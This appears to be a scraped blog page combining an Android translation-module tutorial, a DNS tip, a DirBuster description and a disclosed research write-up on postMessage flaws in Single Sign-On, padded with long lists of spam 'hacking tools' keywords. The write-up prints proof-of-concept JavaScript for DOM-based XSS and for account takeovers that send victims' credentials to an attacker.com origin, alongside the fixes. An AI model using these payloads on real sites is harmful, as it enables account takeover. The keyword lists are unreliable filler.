Selasa, 30 Mei 2023

How To Automatically Translate Any Android App Into Any Language

There is the number of applications which are not having the features of translating apps to your favorite languages. This makes it difficult for the users to translate apps into their native language. Today, I am going to tell you about an application which will help you to Automatically Translate Any Android App into Any Language.
Nowadays there are around hundreds of application on play store which is having the feature of translate but some applications don't have this features. This is just because they don't have proper developers or sometimes translators.
There is an application launched by Akhil Kedia from XDA Developer which made it possible for all the users to translate the application to any language you need. This is something which everyone needs it.
Akhil Kedia built an Xposed module in which users can easily change the language of any application to whichever they like or love. Personally, we all love English language but there are peoples in many parts of the world they are suitable for other languages.
Automatically Translate Any Android App into Any Language
Automatically Translate Any Android App into Any Language

Automatically Translate Any Android App into Any Language

The best part about this Xposed Module is that it translates the application to any language whichever you like and there are around many languages which you can try it. The other best part about this application is that the user interface which is amazing.
In an Android application, the best thing is the user interface. This is something which helps users to download the module or application to run again and again. There are about many settings which can be changed from the application.
The setup process is a bit different from other applications but if you will look at the application you will definitely love it. Just because of too many settings and features available in the application and you can turn it to any language without any crashing issues of the application.

Requirements:

  • Rooted Android Phone
  • Xposed Framework installed on your phone.
  • Android 5.0 or higher.
  • Unknown Source enabled (You might be knowing it)
How to Automatically Translate Any Android App into Any Language
  • Download the module called as All Trans from here: Download
Automatically Translate Any Android App
  • Now, after installation, it will ask you to reboot your phone to activate the module
  • Now, you need to get the API Key to get it you need to sign up with Yandex first so sign up: Yandex Sign up
Automatically Translate Any Android App
  • Then after sign up you will get the API key just enter the API key in the All-Trans application.
Automatically Translate Any Android App
  • Open All Trans Application and the swipe right to Global Settings.
Automatically Translate Any Android App
  • Click on Enter Yandex Subscription key and then enter your key.
Automatically Translate Any Android App
  • In Global Settings click on Translate from and select the Language the application is already in. (Eg: English)
Automatically Translate Any Android App
  • Now, click on translate to and select your favorite language. This will change the language.
Automatically Translate Any Android App
  • Swipe left and select the applications which you need to translate and done.
Automatically Translate Any Android App
  • After selecting just open the application and the language is translated automatically.
Automatically Translate Any Android App

Final Words:

This is the best and easy way to Automatically Translate Any Android App into Any Language. I hope you love this article.Share this article with your friends and keep visiting for more tips and tricks like this and I will meet you in the next one.
Stay Updated Tune IemHacker

Related posts
  1. Hacker Tools 2020
  2. Hacking Tools Windows
  3. Tools Used For Hacking
  4. Bluetooth Hacking Tools Kali
  5. Pentest Tools Github
  6. Pentest Tools Download
  7. Hacker Tools For Mac
  8. Hacker Tools Apk
  9. Hacker Tools 2020
  10. Pentest Tools Subdomain
  11. Hack App
  12. What Are Hacking Tools
  13. Hacking Tools For Windows 7
  14. What Is Hacking Tools
  15. Hacker Hardware Tools
  16. Hack Rom Tools
  17. Kik Hack Tools
  18. Beginner Hacker Tools
  19. Computer Hacker
  20. Hacker Tools Windows
  21. Hacking Tools Software
  22. Install Pentest Tools Ubuntu
  23. Pentest Recon Tools
  24. Hacking Tools Windows 10
  25. Hack Rom Tools
  26. Hacking Tools
  27. Hacking Tools Kit
  28. Pentest Tools For Ubuntu
  29. Hack Tools
  30. Hacks And Tools
  31. Hack Tools For Mac
  32. Hacking Apps
  33. Pentest Tools For Mac
  34. Hacker Tools Hardware
  35. Pentest Tools Linux
  36. Hack Apps
  37. Best Hacking Tools 2019
  38. Pentest Tools Url Fuzzer
  39. Pentest Tools Apk
  40. Hack Tools Online
  41. Hack Tools
  42. Hack Tool Apk No Root
  43. Hack Tools Mac
  44. Hacker Tools Free
  45. Pentest Tools Url Fuzzer
  46. Pentest Recon Tools
  47. Hack Tools Mac
  48. Hacking Tools Kit
  49. Hack Tools Mac
  50. Hacking Tools Hardware
  51. Hacker
  52. Hack Tool Apk No Root
  53. Hacker Tools Apk
  54. Hacks And Tools
  55. Black Hat Hacker Tools
  56. Hacking Tools Windows
  57. Pentest Tools Github
  58. Usb Pentest Tools
  59. Hack Tools Mac
  60. Hacking Tools Windows 10
  61. Hacking Tools For Pc
  62. Hacking Tools For Beginners
  63. Pentest Tools List
  64. Hacking Tools Hardware
  65. Hack Website Online Tool
  66. Hack Tools For Windows
  67. Tools 4 Hack
  68. Best Hacking Tools 2019
  69. Hack Rom Tools
  70. Hacking Tools Online
  71. Computer Hacker
  72. Pentest Tools Port Scanner
  73. Pentest Tools Apk
  74. Pentest Tools Subdomain
  75. Hacking Tools And Software
  76. Hackers Toolbox
  77. Hacking Tools For Beginners
  78. How To Make Hacking Tools
  79. Tools Used For Hacking
  80. Hack Tools For Pc
  81. What Are Hacking Tools
  82. Best Pentesting Tools 2018
  83. Growth Hacker Tools
  84. Hacker Tools 2020
  85. Top Pentest Tools
  86. What Are Hacking Tools
  87. Nsa Hack Tools
  88. Pentest Tools For Android
  89. Hacker Search Tools
  90. Pentest Tools Url Fuzzer
  91. Hacking Tools 2020
  92. Hak5 Tools
  93. Hacker Tools Software
  94. Wifi Hacker Tools For Windows
  95. Best Hacking Tools 2019
  96. Black Hat Hacker Tools
  97. Bluetooth Hacking Tools Kali
  98. What Are Hacking Tools
  99. Hack Tools Mac
  100. Hacking Tools 2020
  101. Android Hack Tools Github
  102. Hacking Tools Usb
  103. Hacking Tools For Windows Free Download
  104. Hacking Tools For Mac
  105. Hacking Tools For Games
  106. Pentest Tools For Mac
  107. Best Hacking Tools 2019
  108. Black Hat Hacker Tools
  109. Hacker Search Tools
  110. Hacking Tools 2019
  111. New Hack Tools
  112. Pentest Tools Subdomain
  113. Hacking Tools 2020
  114. Hack App
  115. Hacker Hardware Tools
  116. Hacking Tools Kit
  117. What Is Hacking Tools
  118. Best Hacking Tools 2020
  119. Hacker Tools Apk
  120. Pentest Tools Nmap
  121. Hacker Tools Free Download

HOW TO BOOST UP BROWSING SPEED?

Internet speed is the most cared factor when you buy an internet connection. What if still, you face a slow speed browsing problem? No worries, as I came with a solution to this problem. I will let you know how to boost up browsing speed. It's very simple to follow.

SO, HOW TO BOOST UP BROWSING SPEED?

There can be many ways you can get a speedy browsing whether you use paid service or free hacks. I am going to share this free speed hack with you.

STEPS TO FOLLOW

  1. Navigate to Control Panel > Network and Internet Options > Network and Sharing Center.
  2. Now look for the active internet connection to which you're currently connected to.
  3. Open up Connection Properties of your active connection.
  4. Click on IPv4 and open its Properties.
  5. Here you will notice your DNS, you just need to change your DNS address with the following DNS.
    Preferred DNS server: 208.67.222.222
    Alternate DNS server: 208.67.220.220
  6. Once done, save it and no configure it for IPv6. Just change the IPv6 DNS with the following DNS.
    Preferred DNS server: 2620:0:ccc::2

    Alternate DNS server: 2620:0:CCD::2
  7. Finally, save and you're done with it.
That's all. You have successfully learned how to boost up browsing speed. Hope it will work for you. Enjoy speedy internet..!
Related posts
  1. Hacking Tools Download
  2. Pentest Tools For Mac
  3. Hacking Tools Name
  4. Pentest Reporting Tools
  5. Pentest Tools Windows
  6. How To Hack
  7. Hack Tools 2019
  8. Pentest Tools Android
  9. Hacker Tools List
  10. Pentest Tools For Ubuntu
  11. Hack Tools For Mac
  12. Hackrf Tools
  13. Hacker Tools Linux
  14. Hacking Tools For Beginners
  15. Computer Hacker
  16. Hack Tools Download
  17. Hacking Tools Name
  18. Hacking Tools For Windows
  19. Ethical Hacker Tools
  20. Pentest Tools Online
  21. How To Hack
  22. Top Pentest Tools
  23. Pentest Tools For Windows
  24. Hak5 Tools
  25. Hacking Apps
  26. Nsa Hack Tools Download
  27. What Are Hacking Tools
  28. Hack And Tools
  29. Pentest Tools Review
  30. Pentest Recon Tools
  31. Hacking Tools For Mac
  32. Hacking Tools For Games
  33. Hack Website Online Tool
  34. Hacking Tools Usb
  35. Hack Tools For Mac
  36. Pentest Tools Apk
  37. Termux Hacking Tools 2019
  38. Nsa Hack Tools Download
  39. Pentest Tools Windows
  40. How To Make Hacking Tools
  41. Pentest Tools Online
  42. Best Hacking Tools 2020
  43. Pentest Tools Tcp Port Scanner
  44. Hack Tools Pc
  45. Free Pentest Tools For Windows
  46. Hack And Tools
  47. Hacking Tools Software
  48. Hacker Tools Windows
  49. Nsa Hacker Tools
  50. Hacker Tools Software
  51. Hacking Tools Pc
  52. Hacker Tools For Windows
  53. Hacker
  54. Hacker Tools Linux
  55. Pentest Tools For Windows
  56. Underground Hacker Sites
  57. Hacker Tools Free Download
  58. Hacker Hardware Tools
  59. Hack Website Online Tool
  60. Install Pentest Tools Ubuntu
  61. Pentest Reporting Tools
  62. Pentest Tools Download
  63. Black Hat Hacker Tools
  64. Underground Hacker Sites
  65. Pentest Tools Github
  66. Physical Pentest Tools
  67. Bluetooth Hacking Tools Kali
  68. Hack Tools Mac
  69. Hacker Tools Github
  70. Pentest Tools Alternative
  71. Pentest Tools Kali Linux
  72. Pentest Tools Website Vulnerability
  73. Hacking Tools 2020
  74. How To Make Hacking Tools
  75. Hack Tools Pc
  76. Tools For Hacker
  77. Hacking Tools Kit
  78. Wifi Hacker Tools For Windows
  79. Hacker
  80. Hacker Tools 2019
  81. Best Hacking Tools 2020
  82. Usb Pentest Tools
  83. Hack Tools
  84. Pentest Tools Free
  85. Hack Tools Pc
  86. Hacking Tools Name
  87. Hacking Tools Name
  88. Game Hacking
  89. Hacker Tools 2019
  90. Tools For Hacker
  91. Best Pentesting Tools 2018
  92. Hacking App
  93. Tools 4 Hack
  94. World No 1 Hacker Software
  95. Hacking Tools For Games
  96. Hack Tools For Ubuntu
  97. Hack App
  98. Game Hacking
  99. Android Hack Tools Github
  100. World No 1 Hacker Software
  101. Hacking Tools Windows 10
  102. Hacker Tools Github
  103. Usb Pentest Tools
  104. Hacker Tools For Ios
  105. Hacker Tools 2019
  106. Hacker Tools For Mac
  107. Hacker
  108. Pentest Tools Linux
  109. Hacks And Tools
  110. Hack Tools Github
  111. Hak5 Tools
  112. Hacking Apps
  113. Hacking Apps
  114. Growth Hacker Tools
  115. Hacker Tools Github
  116. Hack Tools For Ubuntu
  117. Best Hacking Tools 2020
  118. New Hack Tools
  119. Hacker Tools Hardware

Senin, 29 Mei 2023

DirBuster: Brute Force Web Directories


"DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. DirBuster attempts to find these. However tools of this nature are often as only good as the directory and file list they come with. A different approach was taken to generating this. The list was generated from scratch, by crawling the Internet and collecting the directory and files that are actually used by developers! DirBuster comes a total of 9 different lists (Further information can be found below), this makes DirBuster extremely effective at finding those hidden files and directories. And if that was not enough DirBuster also has the option to perform a pure brute force, which leaves the hidden directories and files nowhere to hide! If you have the time ;) " read more...

Download: https://sourceforge.net/projects/dirbuster

Read more

  1. Hacking Tools Usb
  2. Pentest Tools Bluekeep
  3. Hacker Tools Free
  4. Pentest Tools Linux
  5. Pentest Tools Url Fuzzer
  6. How To Install Pentest Tools In Ubuntu
  7. Hacker Tools 2020
  8. Underground Hacker Sites
  9. Pentest Tools For Android
  10. Hack Tools
  11. Hacking Tools Windows
  12. Pentest Tools Download
  13. Pentest Tools Tcp Port Scanner
  14. What Are Hacking Tools
  15. Hacking Tools Software
  16. Pentest Tools Url Fuzzer
  17. Black Hat Hacker Tools
  18. Pentest Tools Website
  19. What Is Hacking Tools
  20. Hacking Tools Github
  21. Hacker Tools For Windows
  22. Pentest Tools List
  23. Tools 4 Hack
  24. Hacking Tools Windows
  25. Growth Hacker Tools
  26. Hack Tool Apk No Root
  27. Hacking Tools Online
  28. Hacker Tools For Mac
  29. Hacker Tools Linux
  30. Hacker Tools Apk Download
  31. New Hacker Tools
  32. Wifi Hacker Tools For Windows
  33. Termux Hacking Tools 2019
  34. Hacker Search Tools
  35. Pentest Box Tools Download
  36. Hack Tools For Games
  37. Hak5 Tools
  38. Pentest Tools For Windows
  39. Hack Tools Github
  40. Beginner Hacker Tools
  41. Pentest Box Tools Download
  42. Pentest Tools Review
  43. Hacker Tools Free
  44. Growth Hacker Tools
  45. Nsa Hack Tools Download
  46. Hack Tools Mac
  47. Pentest Tools Url Fuzzer
  48. Hack Tool Apk
  49. Pentest Tools Linux
  50. Pentest Tools Bluekeep
  51. Best Hacking Tools 2020
  52. Pentest Reporting Tools
  53. Hacking Tools For Beginners
  54. Hack Tools
  55. Hacker Tools For Pc
  56. Hacking App
  57. Pentest Tools Kali Linux
  58. Game Hacking
  59. Nsa Hack Tools Download
  60. Hack Tool Apk
  61. Hak5 Tools
  62. Hack Tools Download
  63. Hacker Tools Windows
  64. Pentest Tools Subdomain
  65. Hacker Tools Online
  66. Pentest Recon Tools
  67. Github Hacking Tools
  68. Hacking Tools Github
  69. Pentest Tools Find Subdomains
  70. Hacker Tools For Pc
  71. Pentest Tools Bluekeep
  72. Hack App
  73. Hacks And Tools
  74. Hacker Tools For Pc
  75. Hacking Apps
  76. Hacking Tools Online
  77. Hack Tool Apk No Root
  78. Hack Tools
  79. Hacking Tools And Software
  80. Hacker Techniques Tools And Incident Handling
  81. Pentest Tools Open Source
  82. Hacking Tools Software
  83. Pentest Automation Tools
  84. Hacking Tools Online
  85. Wifi Hacker Tools For Windows
  86. Hacking Tools Software
  87. Hacker
  88. Computer Hacker
  89. Hacker Hardware Tools
  90. Hacking Apps
  91. Pentest Tools Free
  92. How To Install Pentest Tools In Ubuntu
  93. Pentest Tools For Windows
  94. Hacker Hardware Tools
  95. Hacker Tools
  96. Pentest Tools Tcp Port Scanner
  97. Growth Hacker Tools
  98. Pentest Tools Download
  99. Beginner Hacker Tools
  100. Hacking Tools Pc
  101. Easy Hack Tools
  102. Pentest Tools Apk
  103. World No 1 Hacker Software
  104. Pentest Automation Tools
  105. Hacks And Tools
  106. Hacker Tools Github
  107. Android Hack Tools Github
  108. Hacker Tools Linux
  109. Hacking Tools For Windows
  110. Bluetooth Hacking Tools Kali
  111. Hacker Tools Apk Download
  112. Hacking Tools Usb
  113. Pentest Tools Nmap
  114. Hacking Tools Usb
  115. Hacker Techniques Tools And Incident Handling
  116. Hackers Toolbox
  117. Hacker Tools Free
  118. Hacker Security Tools
  119. Pentest Recon Tools
  120. Hacker Tools Apk
  121. What Are Hacking Tools
  122. Pentest Tools Tcp Port Scanner
  123. Hacking Tools Hardware
  124. Hacker Tools Mac
  125. Pentest Tools For Android
  126. Hack Tools Mac
  127. Hacking Tools Github

Security And Privacy Of Social Logins (II): PostMessage Security In Single Sign-On

This post is the second out of three blog posts summarizing my (Louis Jannett) research on the design, security, and privacy of real-world Single Sign-On (SSO) implementations. It is based on my master's thesis that I wrote between April and October 2020 at the Chair for Network and Data Security.

We structured this blog post series into three parts according to the research questions of my master's thesis: Single Sign-On Protocols in the Wild, PostMessage Security in Single Sign-On, and Privacy in Single Sign-On Protocols.

Overview

Part I: Single Sign-On Protocols in the Wild

Although previous work uncovered various security flaws in SSO, it did not work out uniform protocol descriptions of real-world SSO implementations. We summarize our in-depth analyses of Apple, Google, and Facebook SSO. We also refer to the sections of the thesis that provide more detailed insights into the protocol flows and messages.
It turned out that the postMessage API is commonly used in real-world SSO implementations. We introduce the reasons for this and propose security best practices on how to implement postMessage in SSO. Further, we present vulnerabilities on top-visited websites that caused DOM-based XSS and account takeovers due to insecure use of postMessage in SSO.

Part III: Privacy in Single Sign-On Protocols (coming soon)

Identity Providers (IdPs) use "zero-click" authentication flows to automatically sign in the user on the Service Provider (SP) once it is logged in on the IdP and has consented. We show that these flows can harm user privacy and enable new targeted deanonymization attacks of the user's identity.

PostMessage Security in Single Sign-On

If you are familiar with OAuth or OpenID Connect, you already know the redirect flow: It opens the Authentication Request in the primary window and returns the Authentication Response with a redirect from the IdP to the SP. This approach requires the browser to reload the entire SP website, which is especially in single-page applications a disadvantage.

The popup flow eliminates the need to reload the SP website by executing the SSO flow in a popup window as follows:

If the sign-in button on the SP website is clicked, the Authentication Request is opened in a new popup window. After the user submits its credentials and grants the consent, the IdP redirects the popup to the `redirect_uri`. From the IdP's perspective, a normal redirect flow is executed. Thus, the IdP does not need not implement any changes to support the popup flow. The SP receives the `code` at its Redirection Endpoint, redeems the `code`, authenticates the user, and finally returns JavaScript that sends an authentication token back to the primary window with postMessage. For instance, the response from the Redirection Endpoint sends the `access_token` (or `id_token` or any other application-specific token) from the popup window back to the primary window as follows:
const access_token = "ya29.a0Af..."; window.opener.postMessage(access_token, "https://sp.com"); 

Prior to that, the following JavaScript is executed in the primary window:

window.onmessage = (event) => { 	if (event.origin !== "https://sp.com") return; 	processToken(event.data); } 

Finally, the primary window receives the authentication token, optionally stores it in localStorage, and may use it for subsequent API calls.

Comparison: response_mode=web_message vs. popup flow

We discovered the popup flow in several real-world SSO implementations, although it is not formally defined in the OAuth or OpenID Connect specifications. Besides the response modes `query`, `fragment`, and `form_post`, we want to raise awareness for `response_mode=web_message`. This response mode requests not to perform any redirects but instead use the postMessage API. After the user submits its credentials and grants the consent, the IdP returns JavaScript, sending the Authentication Response from the popup window to the primary window using postMessage: `window.opener.postMessage("code=XYZ&state=123", "https://sp.com/redirect")`. Although the `redirect_uri` is not required to perform any redirects, it still serves as postMessage destination origin. The SP benefits from this response mode since it does not have to implement a Redirection Endpoint, which is useful for "real" single-page applications. However, the IdP must make changes to its implementation.

Although the `web_message` response mode is not formally specified in current OAuth or OpenID Connect standards, it still is defined in an expired draft from 2016: OAuth 2.0 Web Message Response Mode. Also, the current draft OAuth 2.0 Assisted Token proposes a separate endpoint used by postMessage SSO flows that are executed with iframes in single-page applications. The OAuth 2.0 Multiple Response Type Encoding Practices document leaves space for future specifications as well:

> Note that it is expected that additional Response Modes may be defined by other specifications in the future, including possibly ones utilizing the HTML5 postMessage API and Cross-Origin Resource Sharing (CORS). 

Security

The postMessage API has not only enjoyed popularity by developers but also by bug bounty hunters. The reason is simple: It provides a controlled circumvention of the Same Origin Policy and enables frames of different origins to communicate with each other. This comes at a cost: Developers need to meet specific security requirements to mitigate cross-origin attacks:

Destination Check

The origin of the window that receives the postMessage must be specified in the second parameter of the `postMessage` function. If the message is confidential (i.e., contains the `access_token`, `id_token`, or similar), the wildcard origin `*` must not be used. Instead, the SP origin (i.e., the `redirect_uri`) must be explicitly specified as destination origin. Insufficient destination checks can cause account takeovers.

Origin Check

In the postMessage event listener, the origin of the received postMessage must be checked before the payload is processed. The safest option is to perform a static string compare on the `event.origin` property. Developers need to pay special attention to regular expressions. For instance, `/^https?:\/\/.*sp\.com$/` is insecure, since it classifies `https://attackersp.com` as valid. Insufficient origin checks can cause DOM-based XSS, CSRF logins, and CSRF account linking.

Input Validation

In the postMessage event listener, the message must be validated before it is processed. For instance, let's assume the URL https://sp.com/login is sent with postMessage to an event listener, which navigates to that URL by setting the `window.location.href` property. If the URL is not validated, a maliciously-crafted URL (i.e., `javascript:alert(1)`) will cause DOM-based XSS.

Evaluation

We were curious about the security of postMessage in SSO flows on real-world SPs. To evaluate the current state of postMessage in SSO, the top 250 websites from Moz's list of the most popular websites served as a foundation. 
We identified 63 websites supporting SSO with Apple, Google, or Facebook. Out of 15 websites implementing the popup flow with postMessage, we found that ten are vulnerable to an account takeover and two are vulnerable to DOM-based XSS. 
In the following, we present three vulnerabilities on real-world SPs. Check out Section 4.5 of the thesis for more details and attacks.

Vuln. 1) DOM-based XSS on myaccount.nytimes.com

The website myaccount.nytimes.com was vulnerable to DOM-based XSS due to a missing postMessage origin check and insufficient input validation within the postMessage event listener.

The SSO flow on nytimes.com works as follows: If the user clicks the sign-in button on https://myaccount.nytimes.com/auth/login, the Authentication Request is opened in a new popup window. The user signs in, grants the consent, and the popup is redirected to the Redirection Endpoint on https://myaccount.nytimes.com/auth/google-login-callback?code=XYZ. The backend receives the code, redeems the code, authenticates the user, sets session cookies, and returns JavaScript that sends a postMessage containing a target URL to which the primary window should redirect after successful authentication.
Therefore, the primary window on https://myaccount.nytimes.com/auth/login registered the following (vulnerable) event listener:
// webpack:///./jsx/src/unified-lire/lire-ui-bundle/components/fullPage/FullPageView.js handleSsoPopupMessage = (e) => {     const payload = receivePostMessage(e);     if (payload.message == "SSO_ACTION_SUCCESS") {         window.top.location.href = payload.props.redirectUri;     } }  // webpack:///./jsx/src/utils/iFramePostMessages.js receivePostMessage = (e) => {     if (isNytimesDomain(e.origin)) return e.data; } isNytimesDomain = () => true; 

As you might have noticed, the event listener wants to validate the origin of the postMessage with the `isNytimesDomain` function, which returns `true` for all origins. Then, it redirects to the URL sent in the postMessage by setting the `window.top.location.href` property, but without validating the URL. We can use the `javascript` scheme to achieve DOM-based XSS. Therefore, the attacker embeds the following PoC on its malicious website:
window.popup = window.open("https://myaccount.nytimes.com/auth/login", "_blank"); setTimeout( () => { 	window.popup.postMessage({ 		"message": "SSO_ACTION_SUCCESS", 		"props": { 			"oauthProvider": "google", 			"redirectUri": "javascript:alert(document.domain)", 			"action": "LOGIN" 		} 	}, "*"); }, 2000); 

Responsible Disclosure

  • 2020-08-27: Initial report sent to The New York Times via HackerOne Disclosure Assistance
  • 2020-09-09: Acknowledged by HackerOne
  • 2020-11: Fixed with a domain whitelist: `["nytimes.com", "captcha-delivery.com", "localhost"].includes(...)`

Vuln. 2) Account Takeover on cbsnews.com, cnet.com, and zdnet.com

The websites cbsnews.com, cnet.com, and zdnet.com are brands of the CBS Interactive group and were vulnerable to a full account takeover due to an insufficient destination check in the `postMessage` function. Since the websites use a common authentication system, all three websites (and even more) were equally vulnerable.
In the following, we demonstrate the attack applied on cnet.com:

The SSO flow on cnet.com involves a popup window and an iframe on the primary window. The iframe loads the easyXDM library, which is (insecurely) used as a proxy between the popup window and the primary window.

If the user clicks the "Continue with Facebook" button on cnet.com, the Login Endpoint is opened in a new popup window. In return, it redirects the Authentication Request to Facebook. The user signs in, grants the consent, and the popup is redirected to the Redirection Endpoint. The backend receives the code, redeems it, creates a custom `accessCredential`, and returns JavaScript that calls the `setAccessCredentials` function in the iframe. The `accessCredential` is passed as a parameter to that function such that the iframe receives it. Note that this JavaScript callback only works because the iframe and popup window share the same origin.
Finally, the proxy iframe relays the `accessCredential` to the primary window using postMessage. The postMessage destination origin is retrieved from the `xdm_e` query parameter of the iframe URL. Note that this parameter is not validated, which is the core vulnerability in this flow.
To exploit this vulnerability, an attacker registers a postMessage event listener that will later receive the victim's `accessCredential` on its malicious website. It then embeds the proxy iframe and loads it with the `xdm_e=https://attacker.com` query parameter. Finally, the URL that starts the SSO flow is opened in a new popup window.
window.addEventListener("message", (e) => { alert(e.data); });  window.iframe = document.createElement("iframe"); window.iframe.name = "easyXDM"; window.iframe.src = "https://urs.cnet.com/pageservices/social/oauth/proxy?xdm_e=https%3A%2F%2Fattacker.com&xdm_c=urs375&xdm_p=1"; window.iframe.onload = () => { 	window.open("https://urs.cnet.com/pageservices/social/oauth/connect/facebook/375?extras=%7B%22requestType%22%3A%22SOCIAL_AUTH%22%2C%22version%22%3A%22v2.2%22%7D&frameId=easyXDM", "_blank"); } 

If the victim visits the malicious website, is logged in on Facebook, and has valid consent for `cnet.com`, the malicious website automatically receives the victim's `accessCredential`, enabling the attacker to gain access to the victim's account.

Responsible Disclosure

  • 2020-08-09: Initial report sent to support.cnet@cbsinteractive.com
  • 2020-08-11: Acknowledged by CNET Customer Support
  • 2020-08-28: Fix provided with an access control list containing insecure regular expressions: `/^.*\.cnet\.com((\/.*)?)$/` is valid for `xdm_e=https://attacker.com/.cnet.com`
  • 2020-08-28: Second report sent to support.cnet@cbsinteractive.com
  • 2020-08-29: Acknowledged by CNET Customer Support
  • 2020-09-04: Fix provided with secure regular expressions: `/^(https:\/\/)([a-zA-Z0-9\-]+\.)*cnet\.com((\/.*)?)$/`

Vuln. 3) Account Takeover in SAP Customer Data Cloud (GIGYA)

The SAP Customer Data Cloud, formally known as GIGYA, offers SSO as a Service: It acts both as IdP for its customers and SP for Google, Facebook, and other public IdPs. For instance, www.independent.co.uk and abc.es integrate the SAP IdP to offer both Google and Facebook SSO with a single codebase.
We discovered a vulnerability in the postMessage configuration that led to an account takeover on all websites integrating the SAP identity brokerage service for SSO.
We demonstrate the attack applied on www.independent.co.uk as follows:

The SSO flow is started from the SP website by opening the Authentication RequestSAP in a new popup window. This request defines the public IdP (Google) and the domain of the SP website that will finally receive the tokens from the SAP IdP. This domain is not validated correctly: It rejects trivial manipulations (i.e., `domain=https://attacker.com` or `domain=https://www.independent.co.uk.attacker.com`) but fails to detect the `user:pwd@host.com` Basic Authentication URI component.

Thus, an attacker can create a malicious website that opens the Authentication RequestSAP in a new popup window, sets the `client_id` to some targeted SP, and the domain to the URL of that SP with an appended `@attacker.com`. The SAP IdP generates an Authentication RequestGoogle and redirects the popup to that URL. It further associates the `domain` with the `state`. Note that from Google's perspective, the SP is the SAP IdP. After authentication and consent, Google redirects back to the Redirection EndpointSAP. The SAP IdP receives the `code`, redeems it at Google, authenticates the user, creates custom authentication tokens, and finally returns JavaScript, which uses postMessage to return the custom authentication tokens to the SP. Note that the postMessage destination origin is set to the initial domain parameter: `https://[...]@attacker.com`. The backend uses the `state` to retrieve the associated `domain`.

If a victim visits the malicious website, is logged in at Google, and has valid consent, the attacker can immediately receive the tokens from SAP that authenticate the victim on the targeted SP:
window.addEventListener("message", (e) => { alert(e.data);}); window.open("https://socialize.us1.gigya.com/socialize.login?x_provider=googleplus&client_id=2_bkQWNsWGVZf-fA4GnOiUOYdGuROCvoMoEN4WMj6_YBq4iecWA-Jp9D2GZCLbzON4&redirect_uri=%2FGS%2FAfterLogin.aspx&response_type=server_token&state=domain%3Dhttps%253A%252F%252Fwww.independent.co.uk:pwd@attacker.com", "_blank"); 

Responsible Disclosure

  • 2020-08-05: Initial report sent to Secure@sap.com
  • 2020-08-18: Acknowledged by SAP
  • 2020-09-17: Fixed validation on backend server

Acknowledgments

My thesis was supervised by Christian Mainka, Vladislav Mladenov, and Jörg Schwenk. Huge "thank you" for your continuous support, advice, and dozens of helpful tips. 
Also, special thanks to Lauritz for his feedback on this post and valuable discussions during the research. Check out his blog post series on Real-life OIDC Security as well.

Authors of this Post

Louis Jannett

Read more


  1. Hacking Tools Pc
  2. Hack Website Online Tool
  3. Wifi Hacker Tools For Windows
  4. Blackhat Hacker Tools
  5. Pentest Tools Review
  6. Pentest Tools Bluekeep
  7. Hacking Tools Github
  8. Hack Tools Github
  9. Pentest Tools Download
  10. Hacker Techniques Tools And Incident Handling
  11. Pentest Tools Alternative
  12. Hacking Tools For Beginners
  13. Hackers Toolbox
  14. Pentest Tools Website Vulnerability
  15. Pentest Tools Online
  16. Pentest Automation Tools
  17. Hacker Tools For Ios
  18. Hacking Tools For Mac
  19. Pentest Reporting Tools
  20. Hack Tools Online
  21. Hak5 Tools
  22. Hacking Tools Name
  23. Hacker Tools
  24. Hack And Tools
  25. Ethical Hacker Tools
  26. Hacking Tools Hardware
  27. Pentest Tools Android
  28. Hacking Tools Online
  29. Hacking Tools
  30. Bluetooth Hacking Tools Kali
  31. Hack Tools For Pc
  32. Hacking Tools Windows
  33. Hacker Tools Linux
  34. Free Pentest Tools For Windows
  35. Kik Hack Tools
  36. Pentest Tools Android
  37. Hacker Tools Linux
  38. Hacking Tools Download
  39. Nsa Hack Tools
  40. Pentest Tools For Mac
  41. Hacking Tools Usb
  42. Pentest Tools For Windows
  43. Hacking Tools Windows
  44. Pentest Tools Website
  45. Hacking Tools Windows 10
  46. Github Hacking Tools
  47. Hacker Tools For Windows
  48. Hacking Tools 2020
  49. Hacker Tools Github
  50. Pentest Tools For Ubuntu
  51. Nsa Hacker Tools
  52. Pentest Tools Alternative
  53. Hacking Tools Free Download
  54. Hacker Tools For Mac
  55. Hacking App
  56. Hack Tools For Games
  57. Hacks And Tools
  58. What Is Hacking Tools
  59. Hack Tool Apk No Root
  60. Hacker Tools 2019
  61. Pentest Tools
  62. Hacker Tools Software
  63. Hacks And Tools
  64. New Hack Tools
  65. Pentest Tools Tcp Port Scanner
  66. New Hacker Tools
  67. Tools Used For Hacking
  68. Github Hacking Tools
  69. Hacking Tools 2019
  70. Hack Tool Apk
  71. Hacker Tools Github
  72. Hacking Tools Mac
  73. Kik Hack Tools
  74. Pentest Tools Alternative
  75. Hacking Tools Hardware
  76. Pentest Tools Online
  77. Pentest Box Tools Download
  78. Hack Tools Online
  79. Hacking Tools For Windows 7
  80. Pentest Tools Website
  81. Pentest Tools Github
  82. Hacking Tools For Games
  83. Hacker Tools Github
  84. Pentest Tools Bluekeep